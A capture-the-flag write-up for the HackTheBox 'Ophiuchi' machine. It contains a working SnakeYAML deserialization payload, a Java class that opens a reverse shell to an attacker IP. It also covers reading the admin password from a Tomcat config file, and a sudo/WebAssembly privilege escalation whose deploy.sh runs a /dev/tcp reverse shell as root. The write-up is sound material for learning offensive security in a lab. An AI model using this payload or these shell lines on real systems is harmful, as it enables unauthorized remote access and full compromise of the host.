HTB Ophiuchi
Writeup for Ophiuchi box on HackTheBox.eu
Initial Enumeration
Initial port scan shows port 22 and 8080
The webpage shows a YAML parser form.
Caturing the request in burp we can change the data to post an exploit.
Inital foothold
The yaml-payload.jar is compiled with the following code:
https://github.com/artsploit/yaml-payload
https://medium.com/@swapneildash/snakeyaml-deserilization-exploited-b4a2c5ac0858
package artsploit;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;
import java.net.Socket;
import java.io.InputStream;
import java.io.OutputStream;
import java.lang.*;
public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
public AwesomeScriptEngineFactory() {
try {
String host="10.10.14.82";
int port=4444;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
} catch (IOException e) {
e.printStackTrace();
} catch(InterruptedException ee){
ee.printStackTrace();
}
}
@Override
public String getEngineName() {
return null;
}
@Override
public String getEngineVersion() {
return null;
}
@Override
public List<String> getExtensions() {
return null;
}
@Override
public List<String> getMimeTypes() {
return null;
}
@Override
public List<String> getNames() {
return null;
}
@Override
public String getLanguageName() {
return null;
}
@Override
public String getLanguageVersion() {
return null;
}
@Override
public Object getParameter(String key) {
return null;
}
@Override
public String getMethodCallSyntax(String obj, String m, String... args) {
return null;
}
@Override
public String getOutputStatement(String toDisplay) {
return null;
}
@Override
public String getProgram(String... statements) {
return null;
}
@Override
public ScriptEngine getScriptEngine() {
return null;
}
}
Compile
/usr/lib/jvm/jdk-11.0.10/bin/javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
Open a netcat listener on port 4444
ncat -nvlp 4444
With this we get a shell back as tomcat.
Checking the tomcat users file under /opt/tomcat/conf/tomcat-users.xml we find the admin password.
User flag
This allows us to su into admin.
User Enumeration
sudo -l allows us to run a go command under /opt/wasm-functions/index.go which executes main.wasm then deploy.sh
sudo /usr/bin/go run /opt/wasm-functions/index.go
This leads us to believe we need to compile a web assembly using rust.
Using wasm-pack for rust
File: src/lib.rs
#[no_mangle]
pub extern "C" fn info() -> i32 {
return 1
}
File: Cargo.toml
[package]
name = "exploit"
version = "0.1.0"
authors = ["Your Name <[email protected]>"]
description = "A sample project with wasm-pack"
license = "MIT/Apache-2.0"
repository = "https://github.com/yourgithubusername/hello-wasm"
edition = "2018"
[lib]
crate-type = ["cdylib"]
[dependencies]
wasm-bindgen = "0.2"
File: deploy.sh
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.36/8443 0>&1'
Open a netcat listener
ncat -nvlp 8443
wasm-pack build
scp pkg/exploit_bg.wasm admin@IP:/home/admin/main.wasm
scp deploy.sh admin@IP:/home/admin/deploy.sh
Root flag
Now ssh into the admin account and run the script as admin to get a root reverse shell. This is to be ran from the admin home directory where main.wasm and deploy.sh exist.
sudo /usr/bin/go run /opt/wasm-functions/index.go
This will open a reverse shell to our machine on port 8443 as root